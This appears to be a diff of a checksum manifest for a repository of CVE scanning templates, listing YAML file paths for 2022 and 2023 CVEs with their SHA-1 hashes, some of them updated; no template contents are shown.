+http/cves/2022/CVE-2022-33965.yaml:f3de343202dd5ccf6f87831cea9b2b9eac931925 +http/cves/2022/CVE-2022-34045.yaml:69fc3d9d2a887baa157c099235eb21f5dcc83b7d +http/cves/2022/CVE-2022-34046.yaml:1b93ce3df02f39d971f3289d53d8be285abcc7fc +http/cves/2022/CVE-2022-34047.yaml:bc5df0119fdbcf298ab722c3f578b392e8fbb5fe +http/cves/2022/CVE-2022-34048.yaml:7b19e4a463c1bdb0e5d1f4f5555753996521a69f +http/cves/2022/CVE-2022-34049.yaml:f4a9d3941293071f5112c661481114f3182379ec +http/cves/2022/CVE-2022-34121.yaml:ef849475317347cdc9d08e884b176656029f4dd9 +http/cves/2022/CVE-2022-34328.yaml:b27b9549632a571e41321fcc82ff404aa30cfe71 +http/cves/2022/CVE-2022-34576.yaml:7e0c3c74ae7efee2296de0075bb9b0cc9f152bc2 +http/cves/2022/CVE-2022-34590.yaml:8bd37274587b4703076e2cb14d9fd3427908acc1 +http/cves/2022/CVE-2022-34753.yaml:5307e9dca274f2b5be6a6165536d4fce1130f564 +http/cves/2022/CVE-2022-3484.yaml:9ff6305db19c6724b0ce329fb1267c780bf7d20d +http/cves/2022/CVE-2022-3506.yaml:e157125a4e7f85db0bcce14194ae69c7ed4d9187 +http/cves/2022/CVE-2022-35151.yaml:d86afbdd012f20078c1bb0a6031f17f3b063948f +http/cves/2022/CVE-2022-35405.yaml:c23fafd544490ade2fd0702a508e76a9f6c17183 +http/cves/2022/CVE-2022-35413.yaml:e2aafedfd60fd6612a9c68c9faeb23382616c591 +http/cves/2022/CVE-2022-35416.yaml:0398bb2e546ad02e435899c065961fd18e8cf9d9 +http/cves/2022/CVE-2022-35493.yaml:1e4428ef62de67ffbf2e2ef7a13a8614a00635cd +http/cves/2022/CVE-2022-3578.yaml:1f6198cd462b68a5d69a511d63274ac11860cb81 +http/cves/2022/CVE-2022-35914.yaml:f48fb3a3ad6cac2f424855d5ebba13db7be66bf9 +http/cves/2022/CVE-2022-36446.yaml:b2129a53dba4cab598fd0155e77953d11f0256f1 +http/cves/2022/CVE-2022-36537.yaml:fdb8a25091b6f0d2873c101b684eabd986a20f52 +http/cves/2022/CVE-2022-36642.yaml:d314c6fc2164615d75dfbcdb4d5a2534b68df86e +http/cves/2022/CVE-2022-36804.yaml:6977cfd45ba8fdc1391bdfd9a0d63d781e093d0d +http/cves/2022/CVE-2022-36883.yaml:8733bd42f5d8c398c7884d3a24884d0d6cb4e634 +http/cves/2022/CVE-2022-37042.yaml:07bb69d9585dbb3e5f949a025fe03887da1a4844 +http/cves/2022/CVE-2022-37153.yaml:f80300a202522ccb6a6453748a4f82da54a47436 +http/cves/2022/CVE-2022-37190.yaml:ba4709ffe3e7efe80f974df7a4ebff6ee0a6b06b +http/cves/2022/CVE-2022-37191.yaml:5fc058ff83858b6352401c5f1bea2ac4577cb3fc +http/cves/2022/CVE-2022-37299.yaml:a98d76bd746b4dea7f5735e8ebe392c64b27f65b +http/cves/2022/CVE-2022-3768.yaml:3a57c626ca8dad62c081ea75b80b6baef7963d7e +http/cves/2022/CVE-2022-3800.yaml:c6139286f9e869433eb72e1d4f74eae1c097d22d +http/cves/2022/CVE-2022-38295.yaml:5da46ea34ff436a600b8500ec5e4a70b4e4d01ed +http/cves/2022/CVE-2022-38296.yaml:f80537861236e6fd14e42f4af2ef119f541f6cbf +http/cves/2022/CVE-2022-38463.yaml:25c6c6532b465fdb7ba9ea46d9c92ab45066100c +http/cves/2022/CVE-2022-38467.yaml:833b757621f9f951845283da8c3d312e57ae38ee +http/cves/2022/CVE-2022-38553.yaml:a1fd493f0a09133378fde9c785b3ee21ad45657e +http/cves/2022/CVE-2022-38637.yaml:44a7435dbb373907b10f550d12db8252c7a450a6 +http/cves/2022/CVE-2022-38794.yaml:717244737dc47e38f23e68d46965216660ffad3d +http/cves/2022/CVE-2022-38817.yaml:fcd5fb6bd7141e7201c02a76aea9ad99f66e3656 +http/cves/2022/CVE-2022-38870.yaml:74c7effb2d7351d63d0be1aa1736e5c870945bc7 +http/cves/2022/CVE-2022-3908.yaml:59af8b1ecff4b3276cf0301f96bf36f0f14826dc +http/cves/2022/CVE-2022-39195.yaml:d8a1d506cae6f7b0a20b32208ea15e0bd7da80b2 +http/cves/2022/CVE-2022-3933.yaml:db422ce61f14f96ac3567385c0f69b98c6c2cca2 +http/cves/2022/CVE-2022-3934.yaml:4baf329427c8ad3b74fa2be4abda82e174b4fe24 +http/cves/2022/CVE-2022-3980.yaml:193d3c0616668a41ae89eb18aed05e822ca08783 +http/cves/2022/CVE-2022-3982.yaml:31b56e2963a03f76b8a0a49c7d48a2364811dbb0 +http/cves/2022/CVE-2022-39952.yaml:abf174b60ed29f6e6119887666b875768642d7ce +http/cves/2022/CVE-2022-39960.yaml:bf2e8ec25d1a5971c81d15fb85fa9f547c17726b +http/cves/2022/CVE-2022-39986.yaml:ac1c9b9a1110ee3cd57671a7c776e672773cbe9c +http/cves/2022/CVE-2022-40022.yaml:4bd0ff0f5ede5e658da30a3bcf9139775b107231 +http/cves/2022/CVE-2022-40083.yaml:2fee1973bdc0a2cf5d1540a6535877a8350b49b6 +http/cves/2022/CVE-2022-40127.yaml:70d329f37b030610bdff4f28ca9a24af5ea7fae3 +http/cves/2022/CVE-2022-40359.yaml:c7d30248a09b963bd5422c49e6fd3276dbc69bec +http/cves/2022/CVE-2022-4050.yaml:8172e163c9ca54a7a9979f3f94965d89b6cc3802 +http/cves/2022/CVE-2022-4057.yaml:675e899adf4fc35286320afb6f50fc7f2bc7d678 +http/cves/2022/CVE-2022-4060.yaml:bec1b7df5c69d23f40abb9f1e7f6587fe86d6fdd +http/cves/2022/CVE-2022-4063.yaml:28883e31d17677792fe07feb2f66ad86fead6320 +http/cves/2022/CVE-2022-40684.yaml:c5820074ab205dfd7570b59fd550df03108be8e0 +http/cves/2022/CVE-2022-40734.yaml:e83fe1d72dd8a0ed412e6e907f82c0eaf1fccb94 +http/cves/2022/CVE-2022-40843.yaml:3cd4c45a0fe366a0a4fe0d4bb629dea60e39e123 +http/cves/2022/CVE-2022-40879.yaml:1cb4e1473053a8c6df17099414a0056b1d05e84b +http/cves/2022/CVE-2022-40881.yaml:7119ff45770bb9c333ff123fcf555704e7d634b8 +http/cves/2022/CVE-2022-4117.yaml:5f7947edb472f7d9fdc4b1320e56370518119c3d +http/cves/2022/CVE-2022-4140.yaml:df2a7463a1e9f6422e79d09a4119a0df74b42562 +http/cves/2022/CVE-2022-41441.yaml:48bbed5cd42abc7584ee5afbd918264e1b971f12 +http/cves/2022/CVE-2022-41473.yaml:c77ae1e0bd2669fa3b5430d466c82ed6e88ffce5 +http/cves/2022/CVE-2022-41840.yaml:f12ab55e341a3ae071832c1acd650f3e5738123a +http/cves/2022/CVE-2022-42094.yaml:07e1c79e0c41c6654ed5a5ca6c39353a1a147a11 +http/cves/2022/CVE-2022-42095.yaml:6cd124971183481c63430e446bb86b55e9a6102f +http/cves/2022/CVE-2022-42096.yaml:a3b2451d90f1d8acc50cab561f9991d22f345fa6 +http/cves/2022/CVE-2022-42233.yaml:7ea6b5e68bc51d9aa465af47677512ef4d51947b +http/cves/2022/CVE-2022-4260.yaml:4b48a195cde92c59fb67aa9e08e015b7cc22366c +http/cves/2022/CVE-2022-42746.yaml:88411dcf82512098f148f66dfafe27b7609b73a9 +http/cves/2022/CVE-2022-42747.yaml:e6114a43c0d6f7f788bddccc55ac767f56d88901 +http/cves/2022/CVE-2022-42748.yaml:89e9dbe2e18a9fa67ca7ff03117060ad2e3b8800 +http/cves/2022/CVE-2022-42749.yaml:3e8d7179889467352c62b5123a508be37eabd6ac +http/cves/2022/CVE-2022-4295.yaml:f7f0aa553eba4db0da3be1482fb7f723b0c199c5 +http/cves/2022/CVE-2022-4301.yaml:8df764daa3bffd8c76b97454c4c9279394d3cf6e +http/cves/2022/CVE-2022-43014.yaml:5e32abeef867f114d98aafcd304aa7a8b08170eb +http/cves/2022/CVE-2022-43015.yaml:41e1348bebd8254d1667aa8adce892711eec53a1 +http/cves/2022/CVE-2022-43016.yaml:30a5318534ec7b675789df45f4606d7044c6b738 +http/cves/2022/CVE-2022-43017.yaml:1aaafeecf0e2a1e490db629044ee36fa98b8d3ec +http/cves/2022/CVE-2022-43018.yaml:aa88efb6fe0036a7112c06693fe9c39d5d414d23 +http/cves/2022/CVE-2022-4306.yaml:ee70a82da20cc4608544f50d23608b52b25bec22 +http/cves/2022/CVE-2022-43140.yaml:f3f0aa76521c1a41566bd4dd9d6d71566c31c28e +http/cves/2022/CVE-2022-43164.yaml:fb364fcd179a87c3db5c291af3c41abbd548193f +http/cves/2022/CVE-2022-43165.yaml:5a1bbe736995d612356ecdbb864679ff22008a25 +http/cves/2022/CVE-2022-43166.yaml:8cc635fcd10484b9817238d0122baddca26be6ea +http/cves/2022/CVE-2022-43167.yaml:bf8ed73bf80098ca1c30b9dc5494e602957522c7 +http/cves/2022/CVE-2022-43169.yaml:3e906759dfd2bafb87a8c8ce2056456fbb2fdf5f +http/cves/2022/CVE-2022-43170.yaml:e5be62a95ce2324e7210b95a374d2f745f485d11 +http/cves/2022/CVE-2022-43185.yaml:6d65117c981360b1fda4d8ed74d5f9f0ff535dc4 +http/cves/2022/CVE-2022-4320.yaml:c399c7cfb7e6986121e71da69257830c242f3865 +http/cves/2022/CVE-2022-4321.yaml:5b6f7c7179a2cd95f2e797c1dad9876004eac855 +http/cves/2022/CVE-2022-4325.yaml:0ff58ddc0b230e864679dd568941e6ca5dc41aa3 +http/cves/2022/CVE-2022-4328.yaml:cb351a0441fbeaad392acee54277fb7725bb72c6 +http/cves/2022/CVE-2022-43769.yaml:257b8b874c690116b618dbe5ef532247388354f7 +http/cves/2022/CVE-2022-4447.yaml:978c30503c12c4c94f8f107dc860740f607aa5ef +http/cves/2022/CVE-2022-44877.yaml:4dc0a138d4e9b00912a7826912c9e0e2c7dcbc8e +http/cves/2022/CVE-2022-44944.yaml:bc06e431e1a883ed7ecbe0acc4d040a5ee4a43d6 +http/cves/2022/CVE-2022-44946.yaml:7f386df54ef732290db1f1e680a8524ba94c7e13 +http/cves/2022/CVE-2022-44947.yaml:83241b231a39a82d5341e81a97be9e977406ffe4 +http/cves/2022/CVE-2022-44948.yaml:fb8fef33c013a9d9a5b2d35560e2d839eb36e494 +http/cves/2022/CVE-2022-44949.yaml:d5b6c66dbc1fe53ee10fe5ec5d6f1189201dee38 +http/cves/2022/CVE-2022-44950.yaml:999e74f703c00ac0c4ca0d075df45c58e4629334 +http/cves/2022/CVE-2022-44951.yaml:5b5de731b7b4a4e6f8ee9528934c625d1f24e353 +http/cves/2022/CVE-2022-44952.yaml:e4b8271a3547d959da14d388b583e58cb6d867bb +http/cves/2022/CVE-2022-45037.yaml:b40abe6e4863d680074921add13783b8d2b103f8 +http/cves/2022/CVE-2022-45038.yaml:50c3d9ddaaf9d516c70f9d31dbbb414716b9370a +http/cves/2022/CVE-2022-45354.yaml:48f5bd571cb81d9558c1be01bf231c8f36f06a47 +http/cves/2022/CVE-2022-45362.yaml:4ecfd780b0b445349e957d12b6e85ffb53b2d8b4 +http/cves/2022/CVE-2022-45805.yaml:fb891ae3d11b3b8c4b49cfa51334c3d8ee96e9d7 +http/cves/2022/CVE-2022-45835.yaml:cb45fb27475acb285796c302cadc744553aba308 +http/cves/2022/CVE-2022-45917.yaml:2379b34495ffe2be3167595f2d82eeb7ac0a1963 +http/cves/2022/CVE-2022-45933.yaml:00e9f5b8e10009d362e9b69add9c8e87f1c39985 +http/cves/2022/CVE-2022-46020.yaml:778cf95f7fe453125efa86ddc15d2ff79736c510 +http/cves/2022/CVE-2022-46071.yaml:93a06146fff5ea2d091a244d7ddf0c34063a4731 +http/cves/2022/CVE-2022-46073.yaml:98287bf7405781874da93dfaec3b3a4644873448 +http/cves/2022/CVE-2022-46169.yaml:6549f2f93d41746ee6bc7bfecbbf4240b96f24ab +http/cves/2022/CVE-2022-46381.yaml:05bef9c959ab9792a51c1a522eeb53a34f65bda3 +http/cves/2022/CVE-2022-46443.yaml:9cb3e322cee5fad93fd1c090e6b3337cf5a5a4b2 +http/cves/2022/CVE-2022-46463.yaml:a86b3f8e693455f7fe720ccd6d8a837d2e3b8a8d +http/cves/2022/CVE-2022-46888.yaml:33767b1503f6f44b14026b591ee8857d47e0843f +http/cves/2022/CVE-2022-46934.yaml:7ce8b11fff6e5132ee9b641bf5d3c2fb4c3d4c9b +http/cves/2022/CVE-2022-47002.yaml:f78fa9141442929f47bb2f0dae1fa7b41e15afca +http/cves/2022/CVE-2022-47003.yaml:ce9183af01d9e87a26351807567a605ed3d7e036 +http/cves/2022/CVE-2022-47615.yaml:37ef0e470dc1914fa598fcd671389bffcb4ac592 +http/cves/2022/CVE-2022-47945.yaml:78328855ebb9ff2fc2a21a827b67970fb87c35b2 +http/cves/2022/CVE-2022-47966.yaml:49357ce74f200497cfbddcf56f26ae880c2edd29 +http/cves/2022/CVE-2022-47986.yaml:d140c2460642702b8ce9a8418d3b67773f7612a1 +http/cves/2022/CVE-2022-48012.yaml:d2ce182fa3cbec2b1ef8824a50b51dba5e5cf9ba +http/cves/2022/CVE-2022-48165.yaml:80d227fe6b05da1280ffce649d6d42b52b9c4c3a +http/cves/2022/CVE-2022-4897.yaml:66d1d6ed1311729bc9a6492dfd2ac81d7bfcde43 +http/cves/2023/CVE-2023-0099.yaml:d2107c2c8fd60f62580f34451a2ab496253d8c0c +http/cves/2023/CVE-2023-0126.yaml:7f10a45b41556f48863e266c9dd5cc374be27861 +http/cves/2023/CVE-2023-0236.yaml:38386b368ed288d777df6df88d3e38bf9a9e3ff5 +http/cves/2023/CVE-2023-0261.yaml:6b686a8591b57b731f0846c829af34ae233e026d +http/cves/2023/CVE-2023-0297.yaml:8d4d472d7572130fec6b6a54caf54e1469c55549 +http/cves/2023/CVE-2023-0448.yaml:be6f0af167335d24946b864b90132c982cc6bf02 +http/cves/2023/CVE-2023-0514.yaml:422bd09709dc4b3daeb24de4dd76a7d61ef93c45 +http/cves/2023/CVE-2023-0527.yaml:0954bab9d01f236cabd7b20f67a6cdb80a13864c +http/cves/2023/CVE-2023-0552.yaml:a8e489ec6baf16249ddc9ec926b67b8fc7c4b02d +http/cves/2023/CVE-2023-0562.yaml:1fe882d831fe9c496df37ecec0f4b2584094c0a3 +http/cves/2023/CVE-2023-0563.yaml:3aa64950a40acd4d2c5d72128a029bc721f73146 +http/cves/2023/CVE-2023-0630.yaml:b10010aeed7e80c99edb6fd26f1ade8328d0fd2b +http/cves/2023/CVE-2023-0669.yaml:6a3a574d3f62f8a8c62a51c010058fcdbe9cada3 +http/cves/2023/CVE-2023-0942.yaml:e128a92171def5b07ddf17f71e18e8b4a28bad34 +http/cves/2023/CVE-2023-0948.yaml:f9fcce50d0112734f1ca4ea710ce77d971a8c760 +http/cves/2023/CVE-2023-0968.yaml:4760d84b8a91e3331f372326457faff33d2d411c +http/cves/2023/CVE-2023-1020.yaml:cc2ec642eeeb2621447d623191b25899cb2db7b6 +http/cves/2023/CVE-2023-1080.yaml:21dcad32f3c25f7be717fc7bba952b9513b5c83e +http/cves/2023/CVE-2023-1177.yaml:d90c30bba233380accfbff0b0017d10815166004 +http/cves/2023/CVE-2023-1362.yaml:6b56d0e7a0da04ad18f10d87f9a96b43d955dd28 +http/cves/2023/CVE-2023-1434.yaml:fe2ac7da1b136f55c31f8502a7ffda9cae40648e +http/cves/2023/CVE-2023-1454.yaml:7203cb1093349a0e15102f47a417e849bec2360d +http/cves/2023/CVE-2023-1496.yaml:eaa7c177746f8ecf2ece3efd46e3183e9762fbca +http/cves/2023/CVE-2023-1546.yaml:eac8a6be54d440e6a082de5a048838ac3e1ec021 +http/cves/2023/CVE-2023-1671.yaml:a0b9a8cc823c820f157b0fa0861011e2dbe9a467 +http/cves/2023/CVE-2023-1698.yaml:cb0b7b3ae29476ceb7350cd363fc3f3ce3ab1087 +http/cves/2023/CVE-2023-1730.yaml:87c4e8078816da48699406c51bb31fb93b2924b2 +http/cves/2023/CVE-2023-1835.yaml:65b6ecc4b5286e2a2b0ffe6d12e0aa602ad588c4 +http/cves/2023/CVE-2023-1890.yaml:63701ff164741245e7e95718cac9e338bdd24381 +http/cves/2023/CVE-2023-20073.yaml:6295eeea77054ffb3ca49b223ab5746258f5750e +http/cves/2023/CVE-2023-2023.yaml:f1e003697b18ec10ae17838454a6f91094e376b4 +http/cves/2023/CVE-2023-20864.yaml:21951678d70049b3f5e04de22d233ec097c75885 +http/cves/2023/CVE-2023-20887.yaml:e939ac6c77cb695eec8d230a04e8ac19f07d2919 +http/cves/2023/CVE-2023-20888.yaml:4969eac36ebbcdef8c9a3dc916606e7cf2ded422 +http/cves/2023/CVE-2023-20889.yaml:52c965e087052dc59477a36dd4a8c21e8d4131a3 +http/cves/2023/CVE-2023-2122.yaml:6f0031e3f34494af5940ca7612465948974dc403 +http/cves/2023/CVE-2023-2130.yaml:89a9e92c847403cb5126697db1113312e7946264 +http/cves/2023/CVE-2023-2178.yaml:1586330fff2408fd73ef06a56d80b8bef5309bae +http/cves/2023/CVE-2023-22478.yaml:295acc7bb7f51c78b10b78292142857933e609e7 +http/cves/2023/CVE-2023-22480.yaml:f41aa30cd23eff1c64e4e1f24031e1e43f5f204e +http/cves/2023/CVE-2023-2252.yaml:c5bf60a32ed4b9435fc9d072088ad8d8dfc6b077 +http/cves/2023/CVE-2023-22620.yaml:adc89868d9f7287da30f65c94f7bbb4021949c70 +http/cves/2023/CVE-2023-2272.yaml:5e9682e5c8eae7332c2a26edb7c1eb60261c2dcc +http/cves/2023/CVE-2023-22897.yaml:e550fbf2da26b74acbdca0f4e50c394856890f6d +http/cves/2023/CVE-2023-23161.yaml:359021d2d6af226d6207c10398dc665ca3ac3b2f +http/cves/2023/CVE-2023-23333.yaml:224f99e20d9e35a6128133ed7b934432aa21e3ff +http/cves/2023/CVE-2023-23488.yaml:28d585d35cbfe13e6400c987fe614fa22b6a9678 +http/cves/2023/CVE-2023-23489.yaml:9dd085b7e48ee2f828d2de79907475b780fe4641 +http/cves/2023/CVE-2023-23491.yaml:1a5b98ddd08f5082d2076d510aaf5023e446af99 +http/cves/2023/CVE-2023-23492 2.yaml:503ad1127d9bfa3ffdaa148703be06c91312c31b +http/cves/2023/CVE-2023-2356.yaml:f2fd07fe4c64762d2e2a3ad3e4326bd576a11fce +http/cves/2023/CVE-2023-23752.yaml:95b530417566e21790a45add7914385db04375db +http/cves/2023/CVE-2023-24044.yaml:1e372b73e3d2f7651b8658cd72eedec921fb5e46 +http/cves/2023/CVE-2023-24243.yaml:fab7007ba33419ff543a4b7763ace80225fb996b +http/cves/2023/CVE-2023-24278.yaml:4d9406d1dc68f023c1857e509303da819a4c83a5 +http/cves/2023/CVE-2023-24322.yaml:1e9e16c5d9959ca838b6391fd096c31563a79152 +http/cves/2023/CVE-2023-24367.yaml:faf249c3f2ff7c327cf9d7725f7134806d2b69d2 +http/cves/2023/CVE-2023-24488.yaml:c409608b9d1050ff5d687eee412278c233f0d85f +http/cves/2023/CVE-2023-24489.yaml:d10f95bc2c12614e7f7192f57871b8f14da208f2 +http/cves/2023/CVE-2023-24657.yaml:7f6b27269830343d72aabbf9cc3b6468b0402832 +http/cves/2023/CVE-2023-24733.yaml:2b371df5ef8cff42ce8aecc6ef5670299835f5a5 +http/cves/2023/CVE-2023-24735 2.yaml:571e0c8b77e6db4d05d1b26591ce8c23a6605826 +http/cves/2023/CVE-2023-24737.yaml:4054ade9e45e3b511951b4ef62d855c3f224fbf1 +http/cves/2023/CVE-2023-25135.yaml:6fde05cc952e0a48856618cc9f0354636815791a +http/cves/2023/CVE-2023-25157.yaml:75256e12bfe90097324f0600dcf0e8d2116e9f99 +http/cves/2023/CVE-2023-25346.yaml:24944581a291d6d9ab20cb2c6f4efe877149ae44 +http/cves/2023/CVE-2023-25717.yaml:2354eaf519c3e3081c7cef2f15f7497b92f7b1ec +http/cves/2023/CVE-2023-26067.yaml:1c8871dc46001d0d8411831bdb6ad00e38874e25 +http/cves/2023/CVE-2023-26255.yaml:2d609293d3e23c6f8baa04699fdf45fc1b8e7c12 +http/cves/2023/CVE-2023-26256.yaml:8a398d7098e6540fa993815fbe228c53ddaed11d +http/cves/2023/CVE-2023-26360.yaml:3fb5a75ec346e6b088cedba253f838b65730ffa3 +http/cves/2023/CVE-2023-26469.yaml:5f9b667ed05a84b02194f6f1ab8e7230407af4d4 +http/cves/2023/CVE-2023-2648.yaml:8ce793bc12471103ba9d04bf1d60e9def677f66e +http/cves/2023/CVE-2023-26842.yaml:01fbd2daa3c8e22f6764cd74762ed1cbb5a4d498 +http/cves/2023/CVE-2023-26843.yaml:d7d29e441dc3297f6b4ad066eccfdc647ef984f8 +http/cves/2023/CVE-2023-27008.yaml:f070430dd37aea88b59221fcb842c67411d7c612 +http/cves/2023/CVE-2023-27034.yaml:c669b044ddab55694de90ff004963850bdd7860f +http/cves/2023/CVE-2023-27159.yaml:dc43a62ddec6ff38b3c5190acb86e983a6f0b2dd +http/cves/2023/CVE-2023-27179.yaml:523285bb6dd62e9f102c40e7127754db944c7b3e +http/cves/2023/CVE-2023-27292.yaml:d469b00e46c47d30ac8f674d6f99f60ff62ce4c0 +http/cves/2023/CVE-2023-2732.yaml:d8a5d04ca641e9fe4b0c5be1c790b1d452726e21 +http/cves/2023/CVE-2023-27350.yaml:fe24d5dcf92c74c2faf997bf734fc70a5e93e69f +http/cves/2023/CVE-2023-27372.yaml:cde7df7bfe8984d7e6d22b982e923a5c66ddb80a +http/cves/2023/CVE-2023-27482.yaml:23bbd5fcacb14714176d7faef595a0e528477a50 +http/cves/2023/CVE-2023-27524.yaml:da8a83a2990af4b19c6f42fe411998a0b6cc6bb1 +http/cves/2023/CVE-2023-27587.yaml:a819235770f464cbe1cb532b57fe34c919a7ff56 +http/cves/2023/CVE-2023-2780.yaml:db40792ff460986646151ea927034f5062b2c9f3 +http/cves/2023/CVE-2023-2796.yaml:b91a3cfc1eaf6a275aac33c7a58671633b3b6e12 +http/cves/2023/CVE-2023-28121.yaml:d2293698e26589be232d165d0739ad8349f5ad29 +http/cves/2023/CVE-2023-2822.yaml:b828499817000b8c193eeeabf2fbea5521ec4752 +http/cves/2023/CVE-2023-2825.yaml:4a18f1951a6cdbdc7b02226d6f6ae29e59188955 +http/cves/2023/CVE-2023-28343.yaml:214c6bc75489e9eb0564fd5fa72c6b4b7d2b3d9a +http/cves/2023/CVE-2023-28432.yaml:af1501ee19c7dcc4de5d4007c25b3da56988c080 +http/cves/2023/CVE-2023-28665.yaml:7e882463578f1064010b1a98a93dd9110af0487d +http/cves/2023/CVE-2023-29084.yaml:6f2dfdc112ae56cd56af80f911aaa1511834c41a +http/cves/2023/CVE-2023-29298.yaml:2ec1784eaff977f3afe47412157ca1a3ca02bc39 +http/cves/2023/CVE-2023-29300.yaml:82c28286cc116a0534b451abdef056f63cea992f +http/cves/2023/CVE-2023-29489.yaml:49db4760ca423c748c9b1d39857577d4bee7a416 +http/cves/2023/CVE-2023-29622.yaml:258377fe66918a871bddfa4fc941969e2d02c8b1 +http/cves/2023/CVE-2023-29623.yaml:989c59b734f662126def59dc6422e457be74ad9b +http/cves/2023/CVE-2023-2982.yaml:c3878cb03613a306eed0b448abb71207ced20b63 +http/cves/2023/CVE-2023-29887.yaml:97180dcd4cf535f4d429285524bb0096b768ef88 +http/cves/2023/CVE-2023-29919.yaml:b63182b46fcf60a2d159ec7bda2b75457d34fc7c +http/cves/2023/CVE-2023-29922.yaml:471cb4d6a556a5538535d33206b17b75dbc39522 +http/cves/2023/CVE-2023-29923.yaml:1efd1fcdbbe4bb45be9c5fa210868b8d50062b00 +http/cves/2023/CVE-2023-30019.yaml:88152965bbaaef01b85d8fe9ddfc3c05caeb3af8 +http/cves/2023/CVE-2023-30150.yaml:5454368416351f8899f5395740c81ba8d2c1a4fe +http/cves/2023/CVE-2023-30210.yaml:71ae3d7ad314976aeb71b729180811c8651167f3 +http/cves/2023/CVE-2023-30212.yaml:7bbba5d69097264c92082a2d1c0137a7112afb4f +http/cves/2023/CVE-2023-30256.yaml:fba23a427b13b465c1344cd715b20ace2bab0c04 +http/cves/2023/CVE-2023-30777.yaml:a85266e648712c90b7a61c36203e54bd870a1294 +http/cves/2023/CVE-2023-31059.yaml:79beddc21d9c94f13d891bed078ef8ba86c2e742 +http/cves/2023/CVE-2023-31548.yaml:cc09e62b3690267dd292538836d508334541ae41 +http/cves/2023/CVE-2023-32117.yaml:be5730b349c6bc4b04a813fa448394ef7afe48f5 +http/cves/2023/CVE-2023-32235.yaml:1ee8a15271e75c52af8493627872a9d097406b34 +http/cves/2023/CVE-2023-32243.yaml:5bdc720e281788fd0c3374aaad77445bbe9c2ee5 +http/cves/2023/CVE-2023-32315.yaml:daeb187a6a39aca44cebcdd393b8388541af2801 +http/cves/2023/CVE-2023-32563.yaml:ec30146b99e96f4b7c0542b652eb30f8ca782e98 +http/cves/2023/CVE-2023-33338.yaml:138c23739d5cdabfd062cb6babfff16af2a38dc2 +http/cves/2023/CVE-2023-33439.yaml:041d95dcd9dde9775d7fa216d4a6a4c46dd4e22b +http/cves/2023/CVE-2023-33440.yaml:075a1d28fcc1cf86ce3f3527d576a2337f3f7548 +http/cves/2023/CVE-2023-3345.yaml:bd125ca250989cbe35ff74eac1cb8e49f5701963 +http/cves/2023/CVE-2023-33510.yaml:978fa149974d031bf95b0d3c25974c53f25dae81 +http/cves/2023/CVE-2023-33568.yaml:2cf8f4501c0a3241945aae8a463cc2a3d58183d6 +http/cves/2023/CVE-2023-34124.yaml:5e5cb78ba38ce603559610454cc22822428a3421 +http/cves/2023/CVE-2023-34192.yaml:d0ad54fbdcf0e8f1ce8b2c89e12e0504e3c89033 +http/cves/2023/CVE-2023-34362.yaml:8a955f04f46ccd4c1de5ba8c807e39caee322d67 +http/cves/2023/CVE-2023-34537.yaml:da14bff0ac33a5cec0efa20edc248c09da03b648 +http/cves/2023/CVE-2023-34598.yaml:8786f8b42b10ab39c423a56a5fccc819a6fa4248 +http/cves/2023/CVE-2023-34599.yaml:798a62fa3b6b1f72651909a92040649b9a2c2f19 +http/cves/2023/CVE-2023-3460.yaml:4d0234719856e489912e22a9c48d15e43942e797 +http/cves/2023/CVE-2023-34659.yaml:7a7bf314e289af728389666a1d56a968b72d2859 +http/cves/2023/CVE-2023-3479.yaml:5c81af3ad5c1a8c405589cedaf16e73bb286fb6e +http/cves/2023/CVE-2023-34843.yaml:e5977ec44bfbcfe01f7c49c90665e3e06e5c3265 +http/cves/2023/CVE-2023-34960.yaml:79acae9610ac2a9fdafab0c330aaedc041f3650d +http/cves/2023/CVE-2023-35078.yaml:157f5273c5b118b54975790266fdcbcefc0f13e8 +http/cves/2023/CVE-2023-35082.yaml:f121db71177c52265b0602cbf2d834abc7b1b153 +http/cves/2023/CVE-2023-35843.yaml:b99c8dae48ac17242cdd6442247447b6912f3591 +http/cves/2023/CVE-2023-35844.yaml:0115a7395bda80598bf06076d31288e2759f70ba +http/cves/2023/CVE-2023-35885.yaml:1cf6e7e18bc27b8757b63e980df4bb24bd0a7506 +http/cves/2023/CVE-2023-36287.yaml:1bd4556b22ed1735e6520f1863d7042c2887cdad +http/cves/2023/CVE-2023-36289.yaml:2b72a9da5b1fcd84e96c5dd215aeda4b1e6b1e1b +http/cves/2023/CVE-2023-36346.yaml:5ee129e53dabeed62e34ccb3a09d2ed54738e5bb +http/cves/2023/CVE-2023-36844.yaml:9e86fa9e1151f89573be9f7d770300ffcc62b8ed +http/cves/2023/CVE-2023-36934.yaml:4c03fc9e5a31a62397b5254823bf42c980d470e8 +http/cves/2023/CVE-2023-37265.yaml:4055559adf504d389bb3b7b7de7de1da855e4fcf +http/cves/2023/CVE-2023-37266.yaml:c0f54d30b78925c846255def26f14f293483af19 +http/cves/2023/CVE-2023-37270.yaml:0361d6f58d1acf558c8a09a28ba712cb3031ac52 +http/cves/2023/CVE-2023-37462.yaml:67ac93c0669b64df4ff514546fdbd7c90b8f66f1 +http/cves/2023/CVE-2023-37580.yaml:139acad84a77ceda7a4e60d9340744f1877e7730 +http/cves/2023/CVE-2023-3765.yaml:ef8f8056df025f68a3937edf1e22c0192db14b5c +http/cves/2023/CVE-2023-38035.yaml:633a5a3a093fdb6090aa7307129fd95fa9c1db0b +http/cves/2023/CVE-2023-38205.yaml:218e5899c6a92dbdccfc85ea7c13426df25dc0f7 +http/cves/2023/CVE-2023-3836.yaml:25b8dd6e73711d03b6dea351119ccf6273264015 http/cves/2023/CVE-2023-38433.yaml:056c61cbe4efba6f865ba3410d5b0e9d43f88d0e -http/cves/2023/CVE-2023-38646.yaml:1e7881d442110d693aa5733d8fdac5b66fd2a328 -http/cves/2023/CVE-2023-39026.yaml:d7a2463950015e1f3951c74e245b0298a0168c05 -http/cves/2023/CVE-2023-39120.yaml:c2e5b3bd997e2b6cb63530cc9c7bf1d0cce6e0b7 -http/cves/2023/CVE-2023-39141.yaml:ddb042a08cb413a97f662fbc0aa107a5d4a5574a -http/cves/2023/CVE-2023-39143.yaml:57dbbf664e21aed709d1d1001b3c2f81d42ee9a4 -http/cves/2023/CVE-2023-3936.yaml:718e00aebfd9ba084426938d53da33c2b084fc42 +http/cves/2023/CVE-2023-38646.yaml:98bdb1c2eb33cc347857e0f13c8d89caa8bcb9cd +http/cves/2023/CVE-2023-39026.yaml:a99aee2c317b5b83191558a7a6bc0b45d8c87ede +http/cves/2023/CVE-2023-39120.yaml:e11e08466fdf85d470a511647591e535ecf55acb +http/cves/2023/CVE-2023-39141.yaml:57b33e8f535ca6cf87a2005ecc00263561e0f91e 